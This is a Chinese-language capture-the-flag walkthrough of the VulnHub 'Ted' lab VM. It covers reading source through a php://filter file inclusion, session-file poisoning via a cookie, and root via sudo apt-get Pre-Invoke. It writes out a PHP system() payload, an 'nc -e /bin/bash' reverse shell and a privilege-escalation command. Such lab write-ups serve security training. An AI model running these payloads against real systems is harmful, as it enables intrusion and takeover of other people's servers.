1.下载靶场:
https://download.vulnhub.com/ted/Ted.7zhttps://download.vulnhub.com/ted/Ted.7z2.解压然后用vm打开,网络改为桥接模式:
3.浏览器打开默认端口80:
有一个登录框:
用户名是admin,密码也是admin,但是用了sha方式加密大写:
登入之后,有一个文件搜索框:
没有sql注入,试一下文件读取:
还存在着一个authenticate.php文件,用php伪协议读取一下,结果用base64解码一下:
php://filter/read=convert.base64-encode/resource=authenticate.php
authenticate.php
<?php
session_start();
$DATABASE_HOST = 'localhost';
$DATABASE_USER = 'user';
$DATABASE_PASS = 'password';
$DATABASE_NAME = 'dbname';
// Try and connect using the info above.
$con = mysqli_connect($DATABASE_HOST, $DATABASE_USER, $DATABASE_PASS, $DATABASE_NAME);
if ( mysqli_connect_errno() ) {
// If there is an error with the connection, stop the script and display the error.
die ('Failed to connect to MySQL: ' . mysqli_connect_error());
}
// Now we check if the data from the login form was submitted, isset() will check if the data exists.
if ( !isset($_POST['username'], $_POST['password']) ) {
// Could not get the data that should have been sent.
header('Location: home.php');
}
// Prepare our SQL, preparing the SQL statement will prevent SQL injection.
if ($stmt = $con->prepare('SELECT id, password FROM accounts WHERE username = ?')) {
// Bind parameters (s = string, i = int, b = blob, etc), in our case the username is a string so we use "s"
$stmt->bind_param('s', $_POST['username']);
$stmt->execute();
// Store the result so we can check if the account exists in the database.
$stmt->store_result();
}
if ($stmt->num_rows > 0) {
$stmt->bind_result($id, $password);
$stmt->fetch();
// Account exists, now we verify the password.
// Note: remember to use password_hash in your registration file to store the hashed passwords.
if ($_POST['password'] == $password) {
// Verification success! User has loggedin!
// Create sessions so we know the user is logged in, they basically act like cookies but remember the data on the server.
session_regenerate_id();
$_SESSION['loggedin'] = TRUE;
$_SESSION['name'] = $_POST['username'];
$_SESSION['id'] = $id;
setcookie('user_pref','/',time() + (86400 * 30), "/");
header('Location: home.php');
} elseif ($_POST['password'] == "admin") {
echo "<p>Password hash is not correct, make sure to hash it before submit.</p>";
header('Location: index.php');
} else {
echo "<p>Password or password hash is not correct, make sure to hash it before submit.</p>";
header('Location: index.php');
}
} else {
echo "<p>Username is not correct.</p>";
header('Location: index.php');
}
$stmt->close();
?>
home.php
<?php
session_start();
if (!isset($_SESSION['loggedin'])) {
header('Location: index.html');
exit();
}
$_SESSION['user_pref'] = $_COOKIE['user_pref'];
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Home Page</title>
<link href="style.css" rel="stylesheet" type="text/css">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.1/css/all.css">
</head>
<body class="loggedin">
<nav class="navtop">
<div>
<h1>Simple File Browser</h1>
<a href="logout.php">Logout</a>
</div>
</nav>
<div class="content">
<h2>Home</h2>
<p>Welcome back, <?=$_SESSION['name'];?>!</p>
<br>
<div class="inner_content">
<form method="post" action="home.php">
<input type="text" id="search" name"search" placeholder="Search.." name="search">
<button type="submit">Search</button>
</form>
<br>
<br>
<?php
if (isset($_POST['search'])) {
echo "Showing results for ".$_POST['search'].":";
echo "<br>";
echo "<br>";
echo "<br>";
echo "<br>";
echo "<br>";
echo "<br>";
echo "<br>";
echo "<br>";
}
include($_POST['search']);
?>
</div>
<a href="cookie.php">Cookies Policy</a>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<center>avrahamcohen.ac@gmail.com</center>
</div>
</body>
</html>
$_SESSION['user_pref'] = $_COOKIE['user_pref'];
可以使用cookie中的user_pref字段写入session文件或者直接执行命令:
<?php system("uname -a")>
url编码:
%3C?php%20system(%22uname%20-a%22)?%3E
可以写入webshell,或者nc反弹:
<?php system(“nc -e /bin/bash ip 4444”) ?>
url编码:
%3C?php%20system(%22nc%20-e%20/bin/bash%20ip%204444%22)%C2%A0?%3E
反弹成功:
用apt命令提权:
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
ok。